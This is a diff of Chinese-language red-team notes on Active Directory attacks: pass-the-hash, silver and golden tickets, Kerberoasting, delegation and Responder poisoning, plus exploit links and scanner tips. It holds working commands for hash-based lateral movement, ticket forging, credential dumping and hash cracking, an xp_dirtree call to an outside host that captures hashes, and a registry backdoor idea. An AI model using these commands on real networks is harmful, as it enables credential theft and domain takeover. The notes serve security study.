+- 在每台用于管理 GPO 的电脑上安装 KB2962486 补丁,这样会避免新的凭据放进 GPP 里。
+- 删除现有的 GPP 里包含密码的 xml 文件。
+
+---
+
+### PTH
path-the-hash,中文直译过来就是 hash 传递,在域中是一种比较常用的攻击方式。
-在内网中,获取不到明文密码,且破解不了 hash 时,可以使用 hash 传递,扩展权限。
+在内网中,获取不到明文密码,且破解不了 hash 又想扩大战果时,可以使用 hash 传递,扩展权限。
+
+**必要条件**
+
+- 哈希传递需要被认证的主机能够访问到服务器
+- 哈希传递需要被传递认证的用户名
+- 哈希传递需要被传递认证用户的 NTLM Hash
**攻击方式**
通常来说,pass-the-hash 的攻击模式是这样的:
1. 获取一台域主机高权限
-2. 利用mimikatz等工具导出密码hash
-3. 用导出的hash尝试登陆其他域主机
+2. 利用 mimikatz 等工具导出密码 hash
+3. 用导出的 hash 尝试登陆其他域主机
-根据 NTLM 质询/响应的过程,可以知道哈希传递就是利用对应用户名的 NTLM Hash 加密服务器生成的 Challenge(即 Response),进行比对,完成认证.
+要完成一个 NTLM 认证,第一步需要客户端将自己要参与认证的用户名发送至服务器端,等待服务器端给出的 Challenge⋯⋯,其实哈希传递就是使用用户名对应的 NTLM Hash 将服务器给出的 Chanllenge 加密,生成一个 Response,来完成认证。
+
+Pass The Hash 能够完成一个不需要输入密码的 NTLM 协议认证流程,所以不算是一个漏洞,算是一个技巧。
比如 SMB 可以直接基于 TCP 协议或者 NetBIOS over TCP,SMB 的认证可以基于 SMB,也可以基于 kerberos,这两种认证方式,前者本质上使用了 hash,后者本质上使用了 ticket,导致了 SMB 的 PtH 和 PtT 攻击存在的基础。
目前常用的 hash 传递工具都是通过 445 端口进行攻击的,也是因为 smb 使用了 ntml 认证,所以导致可以 hash 传递。
-**文章**
+- **mimikatz**
+
+ mimikatz 的 PTH 相关操作见 [mimikatz 笔记](../../工具/mimikatz.md#pth)
+
+- **wmiexec**
+ - [Invoke-WMIExec](https://github.com/wsfengfan/Invoke-TheHash)
+ ```
+ Invoke-Module Invoke-TheHash.psd1
+ Invoke-WMIExec -Target 192.168.3.21 -Domain workgroup -Username administrator -Hash ccef208c6485269c20db2cad21734fe7 -Command "calc.exe" -verbose
+ ```
+
+ - [wmiexec](https://github.com/maaaaz/impacket-examples-windows)
+ ```
+ wmiexec -hashes 00000000000000000000000000000000:ccef208c6485269c20db2cad21734fe7 workgroup/administrator@192.168.3.21 "whoami"
+ ```
+
+- **metasploit**
+ ```bash
+ use exploit/windows/smb/psexec # 或 use exploit/windows/smb/psexec_psh
+ set rhosts
+ set smbuser
+ set smbpass # 例如: 00000000000000000000000000000000:c780c78872a102256e946b3ad238f661
+
+ # 工具的参数需要填写固定格式 LM hash:NT hash,可以将 LM hash 填 0(LM hash 可以为任意值),即 00000000000000000000000000000000:NT hash。
+ exploit
+ ```
+
+- **pth-winexe**
+
+ kali 自带的 PTH 套件每个工具都针对 WIN 下相应的 EXE 文件,如使用 Pth-winexe 可以借助哈希执行程序得到一个 cmdshell:
+ ```bash
+ export SMBHASH=xxxxxx...:xxxx...
+ pth-winexe -U administrator% //target-ip cmd
+ # no password 就需要替换成空的 LM hash 加密值: aad3b435b51404eeaad3b435b51404ee
+ ```
+
+- **CrackMapExec**
+ - 工具地址 : https://github.com/byt3bl33d3r/CrackMapExec
+
+ ```
+ cme smb x.x.x.x -u administrator -H xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx -x whoami
+ ```
+
+**kb2871997**
+
+> 以下部分内容来自 [[Windows内网协议学习NTLM篇之NTLM基础介绍](https://www.anquanke.com/post/id/193149)]
+
+在 type3 计算 response 的时候,客户端是使用用户的 hash 进行计算的,而不是用户密码进行计算的。因此在模拟用户登录的时候。是不需要用户明文密码的,只需要用户 hash。微软在2014年5月13日发布了针对 Pass The Hash 的更新补丁kb2871997,能够缓解 PTH,同时,当服务器安装 KB2871997 补丁后,系统默认禁用 Wdigest Auth,内存(lsass 进程)不再保存明文口令。Mimikatz 将读不到密码明文。
+
+但 kb2871997 对于本地 Administrator(rid 为 500,操作系统只认 rid 不认用户名,接下来我们统称 RID 500 帐户)和本地管理员组的域用户是没有影响的。
+
+但 ntlm 认证通过之后,对 ADMIN$ 没有写入权限。那么是什么阻止了我们对本地管理员组的非 RID500 帐户使用哈希传递?为什么 RID 500 帐户具有特殊情况?除此之外,为什么本地管理员成员的域帐户也可以免除这种阻止行为。
+
+真正罪魁祸首是远程访问上下文中的用户帐户控制(UAC)令牌筛选
+
+对于远程连接到 Windows Vista+ 计算机的任何非 RID 500 本地管理员帐户,无论是通过 WMI,PSEXEC 还是其他方法(有个例外,那就是通过 RDP 远程),即使用户是本地管理员,返回的令牌都是已过滤的管理员令牌。
+
+管理员组的非 RID500 账户登录之后是没有过 UAC 的,所有特权都被移除,除了 Change Notify 之类的。而 RID500 账户登录之后也以完全管理特权(”完全令牌模式”)运行所有应用程序,实际是不用过 UAC 的,这个可以自己测试下。
+
+对于本地“管理员”组中的域用户帐户,文档指出:当具有域用户帐户的用户远程登录 Windows Vista 计算机并且该用户是 Administrators 组的成员时,域用户将在远程计算机上以完全管理员访问令牌运行,并且该用户的 UAC 被禁用在该会话的远程计算机上。
+
+如果 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy 项存在(默认不存在)且配置为 1,将授予来自管理员所有本地成员的远程连接完整的高完整性令牌。这意味着未过滤非 RID 500 帐户连接,并且可以成功传递哈希值!
+
+默认情况下这个注册表项是不存在的,我们可以用以留作后门,但是有意思的是,我们之前提过一嘴的,在配置 winrm 的时候,也会遇到同样的问题,本地管理员组的非 RID500 账户不能登录,于是有些运维在搜寻了一堆文章后,开启该注册表项是最快捷有效的问题:)。
+
+**相关文章**
- [hash传递攻击研究](http://sh1yan.top/2019/05/19/Hash-Passing-Attack-explore/)
- [Passing-the-Hash to NTLM Authenticated Web Applications](https://labs.f-secure.com/blog/pth-attacks-against-ntlm-authenticated-web-applications/) - PTH 在 Web 应用中的应用
-- [Pass the Hash with Kerberos :: malicious.link](https://malicious.link/post/2018/pass-the-hash-with-kerberos/)
+- [浅学Windows认证](https://b404.xyz/2019/07/23/Study-Windows-Authentication/)
-**mimikatz**
+---
-mimikatz 的 PTH 相关操作见 [mimikatz 笔记](../../工具/mimikatz.md#哈希传递) 哈希传递部分
+### PTT
-**metasploit**
-```bash
-use exploit/windows/smb/psexec
-set rhosts
-set smbuser
-set smbpass
-exploit
-```
+票据传递攻击(PtT)是一种使用 Kerberos 票据代替明文密码或 NTLM 哈希的方法。PtT 最常见的用途可能是使用黄金票据和白银票据,通过 PtT 访问主机相当简单。
-**pth-winexe**
+**相关文章**
+- [浅学Windows认证](https://b404.xyz/2019/07/23/Study-Windows-Authentication/)
+- [白银票据与黄金票据探究](http://sh1yan.top/2019/06/03/Discussion-on-Silver-Bill-and-Gold-Bill/)
+- [Pass the Hash with Kerberos :: malicious.link](https://malicious.link/post/2018/pass-the-hash-with-kerberos/) - Kerberos 中的 PTH
+- [如何通过 SSH 隧道进行域渗透的 PtT 攻击](https://paper.seebug.org/321/)
+- [How Attackers Use Kerberos Silver Tickets to Exploit Systems ](https://adsecurity.org/?p=2011)
+- [Kerberos Golden Tickets are Now More Golden](https://adsecurity.org/?p=1640)
-kali 自带的 PTH 套件每个工具都针对 WIN 下相应的 EXE 文件,如使用 Pth-winexe 可以借助哈希执行程序得到一个 cmdshell:
-```bash
-export SMBHASH=xxxxxx...:xxxx...
-pth-winexe -U administrator% //target-ip cmd
-# no password 需要替换成空的 LM hash 加密值: aad3b435b51404eeaad3b435b51404ee
+**相关工具**
+- [gentilkiwi/kekeo](https://github.com/gentilkiwi/kekeo)
+
+#### Silver_Tickets
+
+**原理**
+
+白银票据主要是发生在第五步骤上,在 AP_REQ 中的 ST 的组成:
+```
+k(c,tgs)加密[Session_key],[Server_ntlm_hash(Tiket(K(c,s),Client_Name(domainName\Username),TGT_EndTime))]
```
-**Kerberos**
-- [Pass the Hash with Kerberos](https://malicious.link/post/2018/pass-the-hash-with-kerberos/)
-```bash
-ktutil # 使用 ktutil 创建一个 keytab 文件
-ktutil: addent -p uberuser@CORP.SOMEWHATREALNEWS.COM -k 1 -key -e rc4-hmac # 指定用户和FQDN的全大写版本
-Key for uberuser@CORP.SOMEWHATREALNEWS.COM (hex): 88e4d9fabaecf3dec18dd80905521b29 # 输入rc4-hmac(NTLM)哈希值
-ktutil: wkt /tmp/a.keytab # 把 keytab 文件写到磁盘上
-ktutil: exit # 退出
-kinit -V -k -t /tmp/a.keytab -f uberuser@CORP.SOMEWHATREALNEWS.COM # 使用keytab 文件创建一个kerberos ticket
-klist # 验证
+在第四步骤时,票据生成服务器(TGS)给我们发了上面的数据,在第五步骤时,我们需要发送下面的数据。
+```
+K(c,s)加密[Authenticator([DomainName\Username,ServerName(DomainName\Server)])],[Tiket(Server_ntlm_hash(Tiket(K(c,s),Client_Name(domainName\Username),TGT_EndTime)))]
```
-#### PTT
+从需要发送的数据上看,当拥有 Server Hash 时,我们就可以伪造一个不经过 KDC 认证的一个 Ticket,这个也就是白银票据。
+
+PS : Server Session Key 在未发送 Ticket 之前,服务器是不知道 Server Session Key 是什么的。 所以,一切凭据都来源于 Server Hash。
+
+伪造的 `Client-To-Server Ticket`(也有唤作 ST 和 Service Ticket)被称为白银票据。在不与 KDC 通信情况下,通过获取 Server 端服务账号的 NTLM Hash 值,就能伪造该 Server 端服务的票据。不过在 TGT 中已包含了服务实例的唯一标识(SPN 服务),白银票据就只能访问指定的服务。
+
+**白银票据特点**
+
+1. 不需要与 KDC 进行交互
+2. 需要目标服务的 NTLM Hash
+3. 从攻击面来看,伪造白银票据的难度比伪造黄金票据的难度较小,因为一个域中的服务器如果对外的话,非常容易被入侵,并且容易被转储 Server。
+4. 从防御角度来看,需要开启 PAC 认证,但这会降低认证效率,增加 DC 的负担,最根本的还是要加固服务器本身对外的服务。
+5. 因为需要目标机器的 Hash,并且也不是通过伪造 TGT 申请的,因此只能针对对应服务伪造票据(黄金票据直接伪造的是 TGT,而白金票据伪造的是 TGS 发送的票据,也就是说是单向车程)
+
+**白银票据的攻击流程**
+
+1. 获取服务端计算机的服务账号或者服务端计算机账号的 NTLM 哈希(如通过 kerberoast 获取)
+2. 通过 mimikatz 的 kerberos::golden 传递域 SID、目标主机名、服务名称、伪造的用户名、等信息创建白银票据
+3. 将票据注入到内存,并访问服务
+
+- **mimikatz**
+
+ mimikatz 的 Silver_Tickets 相关操作见 [mimikatz 笔记](../../工具/mimikatz.md#Silver_Tickets)
+
+- **ktutil**
+ ```bash
+ ktutil # 使用 ktutil 创建一个 keytab 文件
+ ktutil: addent -p uberuser@CORP.SOMEWHATREALNEWS.COM -k 1 -key -e rc4-hmac # 指定用户和 FQDN 的全大写版本
+ Key for uberuser@CORP.SOMEWHATREALNEWS.COM (hex): 88e4d9fabaecf3dec18dd80905521b29 # 输入 rc4-hmac(NTLM)哈希值
+ ktutil: wkt /tmp/a.keytab # 把 keytab 文件写到磁盘上
+ ktutil: exit # 退出
+ kinit -V -k -t /tmp/a.keytab -f uberuser@CORP.SOMEWHATREALNEWS.COM # 使用 keytab 文件创建一个 kerberos ticket
+ klist # 验证
+ ```
+
+**other**
+
+由于白银票据需要目标服务器的 Hash,所以没办法生成对应域内所有服务器的票据,也不能通过 TGT 申请。因此只能针对服务器上的某些服务去伪造,伪造的服务类型列表如下:
-**黄金票据(Golden Tickets)**
+| 服务注释 | 服务名 |
+| - | - |
+| WMI | HOST、RPCSS |
+| Powershell Remoteing | HOST、HTTP |
+| WinRM | HOST、HTTP |
+| Scheduled Tasks | HOST |
+| LDAP 、DCSync | LDAP |
+| Windows File Share (CIFS) | CIFS |
+| Windows Remote ServerAdministration Tools | RPCSS、LDAP、CIFS |
-krbtgt 账户:每个域控制器都有一个 krbtgt 的用户,是 KDC 的服务账户,用来创建票据授予服务(TGS)加密的密钥。
+**白银票据(Silver Tickets)防御**
+
+1. 尽量保证服务器凭证不被窃取
+2. 开启 PAC (Privileged Attribute Certificate) 特权属性证书保护功能,PAC 主要是规定服务器将票据发送给 kerberos 服务,由 kerberos 服务验证票据是否有效。
+
+开启方式:将注册表中 `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters` 中的 ValidateKdcPacSignature 设置为 1。
+
+---
+
+#### Golden_Tickets
+
+**原理**
+
+黄金票据主要是发生在 kerberos 的第三和第四步骤上。
+
+第二步骤时,AS 发给客户端的数据。
+```
+[Client_ntlm_hash(K(c,tgs))],[Krbtgt_ntlm_hash(k(c,tgs),Client_name(DomainName\Username),TGT_EndTime)]
+```
+在第三步骤时,客户端拥有两个数据,一个是自己账号 ntlm_hash 加密的 session_key、一个是 TGT 凭证,而这个 TGT 凭证是 kertgt 的 ntlm_hash 加密的信息。
攻击者在获取了 krbtgt 账号的 NTLM Hash 之后,通过发送伪造的 TGT(包括 sessionkey)给 TGS 换取任意服务的Client-To-Server Ticket(ST,服务票据),从而获得域内的任意服务权限。即拥有黄金票据就拥有了域内若干权限。
-黄金票据的注意事项:
+如第三步骤中需要发送的内容
+```
+[Session_key(Authenticator([DomainName\Username,ServerName(DomainName\Server)]))],[TGT(Krbtgt_ntlm_hash(k(c,tgs),Client_name(DomainName\Username),TGT_EndTime))]
+```
+
+这样,我们就可以访问域内任意一台服务器.
+
+**黄金票据的注意事项**
- Windows 事件日志不区分 TGT 的合法性,即黄金票据的行为隐蔽性高
- 伪造黄金票据的时候,可以离线生成,减少痕迹
- krbtgt 的密码被修改了,生成的黄金票据就会失效
@@ -265,85 +679,61 @@ krbtgt 账户:每个域控制器都有一个 krbtgt 的用户,是 KDC 的服
- 黄金票据的有效期是十年,即使域管更改了密码,也可以对域内进行十年的权限维持(除了域的认证机制改变等因素)
- 可以使用禁用、删除的帐户进行冒充,甚至是在 Active Directory 中不存在的帐户
-可以通过使用 mimikatz 的 DCSync 获取伪造黄金票据需要的 krbtgt 账号的 hash。该方法中,mimikatz 会模拟域控,向目标域控请求密码账号,不用登录域控,也不用提取 NTDS.DIT 文件。但是该操作需要域管在或者其他高权限账户下进行。
-
-使用 mimikatz 伪造的黄金票据:
-```
-mimikatz.exe "kerberos::golden /domain:<域名> /sid:<域SID> /rc4: /user:<任意用户名> /ptt" exit
-```
-在数据库服务器上,利用域管理员的权限获得 krbtgt 的 NTLM 哈希 36f9d9e6d98ecf8307baf4f46ef842a2,SID 为 S-1-5-21-1812960810-2335050734-3517558805:
-```
-lsadump::dcsync /domain:0day.org /user:krbtgt
-```
-
-得到 krbtgt 哈希之后,使用 mimikatz 的 `kerberos::golden` 生成黄金票据 `golden.kiribi`:
-```
-kerberos::golden /admin:Administrator /domain:0day.org /sid:S-1-5-21-1812960810-2335050734-3517558805 /krbtgt:36f9d9e6d98ecf8307baf4f46ef842a2 /ticket:golden.kiribi
-```
-`/admin` 为伪造的用户名,用户名可以任意伪造 `/domain` 为目标的域名 `/sid` 为目标域名的 SID `/krbtgt` 为 krbtgt 账户密码的 NTLM Hash `/ticket` 为要伪造的黄金票据的名称
-
-常见域内账户 SID:
+**常见域内账户 SID**
- 域用户 SID:S-1-5-21 -513
- 域管理员 SID:S-1-5-21 -512
- 架构管理员 SID:S-1-5-21 -518
- 企业管理员 SID:S-1-5-21 -519(只有在域林根域中伪造票据时才有效,用 AD 域林管理员权限添加就使用 `/sids` 参数)
- 组策略创建者所有者 SID:S-1-5-21 -520
-利用 mimikatz 的 kerberos::ptt 将黄金票据 golden.kiribi 注入到内存中:
-```
-//清除缓存的票据
-kerberos::purge
-//注入黄金票据golden.kiribi
-kerberos::ptt golden.kiribi
-//列出票据
-kerberos::list
-```
-> 导入的票据在20分钟内有效,过期之后再次导入就行
+**黄金票据特点**
-可以访问域控共享目录,还能在 DC 上远程执行 psexec
+1. 需要与 DC 通信
+2. 需要 krbtgt 用户的 hash
+3. 从攻击面来看,获取 krbtgt 用户的 hash 后,可以在域中进行持久性的隐藏,并且日志无法溯源,但是需要拿到 DC 权限,使用黄金票据能够在一个域环境中长时间控制整个域。
+4. 从防御角度来看,需要经常更新 krbtgt 的密码,才能够使得原有的票据失效。最根本的办法是不允许域管账户登录其他服务器。
-但是需要注意的是用 psexec 远程执行命令的时候,需要不能使用 IP 访问。使用 NetBios 的服务名访问才会走 Kerberos 认证,达到伪造凭据的攻击
+**黄金票据的攻击流程**
-- **其他途径**
- - https://pentestlab.blog/tag/dcsync/
+可以通过使用 mimikatz 的 DCSync 获取伪造黄金票据需要的 krbtgt 账号的 hash。该方法中,mimikatz 会模拟域控,向目标域控请求密码账号,不用登录域控,也不用提取 NTDS.DIT 文件。但是该操作需要域管在或者其他高权限账户下进行。
- 获取 krbtgt 账户就直接跳过获取 krbtgt 哈希的步骤。
- 1. 使用 meterpreter 的 kiwi 扩展可以导出:`dcsync_ntlm krbtgt`
- 2. mimikatz 可以在域控的本地安全认证(Local Security Authority)上直接读取 `mimikatz.exe "privilege::debug" "lsadump::lsa /inject /name:krbtgt"`
- 3. 将域控中的 ntds.dit 复制出来,使用其他工具解析
+mimikatz 的 Golden_Tickets 相关操作见 [mimikatz 笔记](../../工具/mimikatz.md#Golden_Tickets)
-**白银票据(Silver Tickets)**
+**其他途径**
+- https://pentestlab.blog/tag/dcsync/
-伪造的 `Client-To-Server Ticket`(也有唤作 ST 和 Service Ticket)被称为白银票据。在不与 KDC 通信情况下,通过获取 Server 端服务账号的 NTLM Hash 值,就能伪造该 Server 端服务的票据。不过在 TGT 中已包含了服务实例的唯一标识(SPN 服务),白银票据就只能访问指定的服务。
+获取 krbtgt 账户就直接跳过获取 krbtgt 哈希的步骤。
+1. 使用 meterpreter 的 kiwi 扩展可以导出:`dcsync_ntlm krbtgt`
+2. mimikatz 可以在域控的本地安全认证(Local Security Authority)上直接读取 `mimikatz.exe "privilege::debug" "lsadump::lsa /inject /name:krbtgt"`
+3. 将域控中的 ntds.dit 复制出来,使用其他工具解析
-白银票据的攻击流程:
-- 获取服务端计算机的服务账号或者服务端计算机账号的 NTLM 哈希(如通过 kerberoast 获取)
-- 通过 mimikatz 的 kerberos::golden 传递域 SID、目标主机名、服务名称、伪造的用户名、等信息创建白银票据
-- 将票据注入到内存,并访问服务
+**白银票据与黄金票据的不同点**
-使用 mimikatz 伪造白银票据:
-```
-mimikatz.exe "kerberos::golden /domain:<域名> /sid:<域 SID> /target:<目标服务器主机名> /service:<服务类型> /rc4: /user:<用户名> /ptt" exit
-```
+- 访问权限不同
+ - Golden Ticket: 伪造 TGT,可以获取任何 Kerberos 服务权限
+ - Silver Ticket: 伪造 TGS,只能访问指定的服务
-例子:访问域控上的 cifs 服务(Windoiws 主机间的文件共享)
+- 加密方式不同
+ - Golden Ticket 由 Kerberos 的 Hash 加密
+ - Silver Ticket 由服务账号(通常为计算机账户)Hash 加密
-在域控上执行以下命令获取域控主机的本地管理员账户 NTLM Hash 为 0f6debeb6023903247c4abe5e5021e23,SID 为 S-1-5-21-1812960810-2335050734-3517558805:
-```
-mimikatz.exe log "privilege::debug" "sekurlsa::logonpasswords" exit
-```
+- 认证流程不同
+ - Golden Ticket 的利用过程需要访问域控,而 Silver Ticket 不需要
-将生成白银票据注入到内存中,并查看票据生成情况。查看目标的文件共享服务成功:
-```
-kerberos::golden /domain:0day.org /target:OWA2010SP3.0day.org /sid:S-1-5-21-1812960810-2335050734-3517558805 /service:cifs /rc4:0f6debeb6023903247c4abe5e5021e23 /user:FFFF /ptt /id:1183
+---
-//不加id开关也行
+### PTK
-kerberos::golden /domain:0day.org /target:OWA2010SP3.0day.org /sid:S-1-5-21-1812960810-2335050734-3517558805 /service:cifs /rc4:0f6debeb6023903247c4abe5e5021e23 /user:FFFF /ptt
-```
+mimikatz 的 PTK 相关操作见 [mimikatz 笔记](../../工具/mimikatz.md#ptk)
+
+---
### Kerberoast
+`Kerberos TGS票据离线破解`
+
+> 以下内容来自文章 [[浅学Windows认证](https://b404.xyz/2019/07/23/Study-Windows-Authentication/#kerberoast)]
+
服务票据使用服务账户的 NTLM Hash 加密,不用获取运行该服务系统的 shell,任何域用户就可以转储 Hash
在 TGS-REP 过程中,TGS 收到请求后,会将 Client-To-Server Ticket(也称为 ST 票据,Client-To-Server Ticket 由Server 密钥加密)、sessionkey_tgs 返回给 Client。当配置 Kerberos 允许的加密类型是 RC4-HMAC_MD5 时,就可以爆破 Client 端获取的 Client-To-Server Ticket,从而获得服务端服务账户的密码。
@@ -365,7 +755,7 @@ Kerberoast 攻击涉及五个步骤:
- 密码到期时间
- 最后一次登录时间
```
- net user administrator /domain可查看
+ net user administrator /domain 可查看
```
攻击者最感兴趣的是具有高权限用户组的服务帐户如域管理员组的成员。要快速列出高权限用户组的服务帐户的方法是枚举“AdminCount” 属性等于“1”的所有帐户。攻击者只需要向 AD 请求具有 SPN 且 AdminCount = 1 的所有用户帐户。
@@ -415,7 +805,7 @@ klist
kerberos::list /export
```
-使用 https://github.com/nidem/kerberoast 工具破解,得到sqlsrv密码为Admin12345:
+使用 https://github.com/nidem/kerberoast 工具破解,得到 sqlsrv 密码为 Admin12345:
```
python tgsrepcrack.py dict.txt 2-40a00000-jack@MSSQLSvc~Srv-DB-0day.0day.org~1433-0DAY.ORG.kirbi
```
@@ -431,8 +821,12 @@ kerberos::ptt test.kirbi
```
攻击者知道一台服务器(或多台服务器)的服务账户和密码,就可以通过此方法将其域用户权限提升到域管。
+---
+
### Kerberoasting
+> 以下内容来自文章 [[浅学Windows认证](https://b404.xyz/2019/07/23/Study-Windows-Authentication/#kerberoasting)]
+
kerberoast 攻击,利用 mimikatz 从内存中导出票据破解。而 Kerberoasting 攻击可以不使用 mimikatz,且普通用户权限就可以实现。
- https://github.com/GhostPack/Rubeus
@@ -472,10 +866,14 @@ hashcat64.exe -m 13100 -w 3 -a 3 -m 13100 hash -w 3 -a 3 ?l?l?l?l?l?l?l
./john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
```
+---
+
### 委派
#### 查找域中委派主机或账户
+> 以下内容来自文章 [[浅学Windows认证](https://b404.xyz/2019/07/23/Study-Windows-Authentication/#%E6%9F%A5%E6%89%BE%E5%9F%9F%E4%B8%AD%E5%A7%94%E6%B4%BE%E4%B8%BB%E6%9C%BA%E6%88%96%E8%B4%A6%E6%88%B7)]
+
当服务账号被设置为非约束性委派时,其 `userAccountControl` 属性会包含为 TRUSTED_FOR_DELEGATION;当被设置为约束性委派时,其 userAccountControl 属性包含 TRUSTED_TO_AUTH_FOR_DELEGATION(T2A4D),且 msDS-AllowedToDelegateTo 属性会被设置为哪些协议:
加载 powerview,查询无约束委派账户:
@@ -519,6 +917,28 @@ kekeo.exe "tgs::s4u /tgt:TGT_sqlsvr@0DAY.ORG_krbtgt~0day.org@0DAY.ORG.kirbi /use
Tgs::s4u /tgt:service_account_tgt_file /user:administrator@testlab.com /service:service_to_access
```
+## 毒化LLMNR和NBT-NS请求
+
+**相关文章**
+- [Windows环境中使用Responder获取NTLMv2哈希并利用](https://www.freebuf.com/articles/system/194549.html)
+- [攻防最前线:一封邮件就能捕获你的口令散列值](https://www.secrss.com/articles/8143)
+- [Steal_NTLMv2_hash_using_File_Download_vulnerability](https://github.com/incredibleindishell/Windows-AD-environment-related/blob/master/Steal_NTLMv2_hash_using_File_Download_vulnerability/README.md) - 任意文件下载漏洞配合 Responder 毒化
+
+**工具**
+- [SpiderLabs/Responder](https://github.com/SpiderLabs/Responder)
+ ```
+ python Responder.py -I eth0
+ ```
+ 在 Windows 机器上 :打开文件浏览器,连接 file://///test.htlm (或者任意文件名);
+ ```
+ cd /usr/share/responder/logs
+ ```
+
+ 或者配合 mssql
+ ```
+ xp_dirtree "\\\aaa.com"
+ ```
+
---
# 漏洞利用
@@ -560,7 +980,7 @@ Tgs::s4u /tgt:service_account_tgt_file /user:administrator@testlab.com /service:
- POC | Payload | exp
- [MS15-034 Checker](https://pastebin.com/ypURDPc4)
-- 文章
+- 相关文章
- [MS15-034/CVE-2015-1635 HTTP远程代码执行漏洞分析](http://blogs.360.cn/post/cve_2015_6135_http_rce_analysis.html)
- MSF 模块
@@ -593,7 +1013,7 @@ Tgs::s4u /tgt:service_account_tgt_file /user:administrator@testlab.com /service:
- ["永恒之蓝"勒索蠕虫漏洞修复工具](https://www.qianxin.com/other/wannacryfix)
**bluekeep & CVE-2019-0708**
-- 文章
+- 相关文章
- [RDP Stands for "Really DO Patch!" – Understanding the Wormable RDP Vulnerability CVE-2019-0708](https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/)
- [worawit/CVE-2019-0708](https://github.com/worawit/CVE-2019-0708/blob/master/NOTE.md)
@@ -634,8 +1054,12 @@ Tgs::s4u /tgt:service_account_tgt_file /user:administrator@testlab.com /service:
本次漏洞存在于微软 SMBv3.0 协议中,该漏洞是由 SMBv3 处理恶意压缩数据包时进入错误流程造成的。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。
+- 相关文章
+ - [Exploiting SMBGhost (CVE-2020-0796) for a Local Privilege Escalation: Writeup + POC](https://blog.zecops.com/vulnerabilities/exploiting-smbghost-cve-2020-0796-for-a-local-privilege-escalation-writeup-and-poc/)
+
- POC | Payload | exp
- [ollypwn/SMBGhost](https://github.com/ollypwn/SMBGhost)
+ - [chompie1337/SMBGhost_RCE_PoC](https://github.com/chompie1337/SMBGhost_RCE_PoC)
- 修复工具
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796
diff --git "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/XSS.md" "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/XSS.md"
index e581b9a7..843969c7 100644
--- "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/XSS.md"
+++ "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/XSS.md"
@@ -85,7 +85,7 @@
- [bugbounty-cheatsheet/cheatsheets/xss.md](https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md)
- [Cross-site scripting (XSS) cheat sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
-**tips**
+**Tips**
- **Firefox 关闭 xss 过滤器**
about:config 把 rowser.urlbar.filter.javascript 改为 false
diff --git "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\344\277\241\346\201\257\346\224\266\351\233\206.md" "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\344\277\241\346\201\257\346\224\266\351\233\206.md"
index ece91e68..3afba841 100644
--- "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\344\277\241\346\201\257\346\224\266\351\233\206.md"
+++ "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\344\277\241\346\201\257\346\224\266\351\233\206.md"
@@ -12,6 +12,9 @@
* **[漏洞](#漏洞)**
* [web漏扫](#web漏扫)
+ * [主动漏扫](#主动漏扫)
+ * [被动漏扫](#被动漏扫)
+ * [动态爬虫](#动态爬虫)
* [综合漏扫](#综合漏扫)
* **[搜索引擎Hacking](#搜索引擎Hacking)**
@@ -21,7 +24,9 @@
* [MAC扫描](#MAC扫描)
* [端口扫描](#端口扫描)
* [域信息](#域信息)
- * [SPN扫描](#SPN扫描)
+ * [域环境](#域环境)
+ * [SPN扫描](#SPN扫描)
+ * [域控](#域控)
* **[网站](#网站)**
* [CDN-查源IP](#CDN-查源IP)
@@ -48,6 +53,10 @@
- http://testphp.vulnweb.com/
- http://testfire.net/
+---
+
+### 主动漏扫
+
**工具**
- **[AWVS-acunetix](https://www.acunetix.com/vulnerability-scanner/)**
- 文章
@@ -60,7 +69,7 @@
docker 部署方案来自 [[国光博客](https://www.sqlsec.com/2020/04/awvs.html)]
```bash
docker pull secfa/docker-awvs # pull 拉取下载镜像
- docker run -it -d -p 13443:3443 secfa/docker-awvs # # 将Docker的3443端口映射到物理机的 13443端口
+ docker run -it -d -p 13443:3443 secfa/docker-awvs # 将Docker的3443端口映射到物理机的 13443端口
# 容器的相关信息
# awvs13 username: admin@admin.com
@@ -71,19 +80,45 @@
- **[al0ne/Vxscan](https://github.com/al0ne/Vxscan) - python3 写的综合扫描工具,主要用来敏感文件探测** - 指纹+端口+目录结合,偏向信息泄露,漏洞扫描结果较少
- **nikto** - 效果一般
-
- `nikto -host http://xxx.xxx.xxx.xx:8080/`
+ ```
+ nikto -host http://xxx.xxx.xxx.xx:8080/
+ ```
- **[boy-hack/POC-T](https://github.com/boy-hack/POC-T)** - 适合批量任务,速度可以
- [刷 SRC 经验之批量化扫描实践](https://www.freebuf.com/sectool/176562.html)
- **[netsparker](https://www.netsparker.com)**
-**被动漏扫**
+---
+
+### 被动漏扫
+
+**相关文章**
- [HTTP被动扫描代理的那些事](https://www.freebuf.com/articles/web/212382.html)
+
+**工具**
- **[chaitin/xray](https://github.com/chaitin/xray) - 长亭的洞鉴漏扫社区版**
- ```
+ ```bash
xray webscan --listen 127.0.0.1:7777 --html-output proxy.html
```
-- **[boy-hack/w13scan](https://github.com/boy-hack/w13scan)** - 一款插件化基于流量分析的扫描器,通过编写插件它会从访问流量中自动扫描,基于Python3。
+- **[w-digital-scanner/w13scan](https://github.com/w-digital-scanner/w13scan)** - 一款插件化基于流量分析的扫描器,通过编写插件它会从访问流量中自动扫描,基于 Python3。
+ ```bash
+ python3 w13scan.py -s 127.0.0.1:7777 --html # 端口可省略,默认为7778,开启--html即实时生成html报告
+ ```
+
+---
+
+### 动态爬虫
+
